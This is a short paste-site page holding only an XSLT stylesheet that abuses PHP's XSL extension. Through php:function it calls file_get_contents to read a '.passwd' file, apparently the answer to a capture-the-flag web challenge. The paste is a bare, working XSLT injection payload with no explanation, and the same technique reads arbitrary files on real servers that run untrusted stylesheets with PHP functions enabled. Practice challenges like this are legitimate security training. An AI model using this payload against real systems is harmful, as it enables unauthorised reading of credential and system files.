Advertisement
Guest User

Untitled

a guest
Feb 18th, 2018
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <xsl:stylesheet version="1.0"
  3. xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  4. xmlns:php="http://php.net/xsl" >
  5.  
  6. <xsl:output method="html"/>
  7.  
  8. <xsl:template match="/">
  9. <xsl:value-of select="php:function('file_get_contents','/challenge/web-serveur/ch50/.passwd')" />
  10. </xsl:template>
  11. </xsl:stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement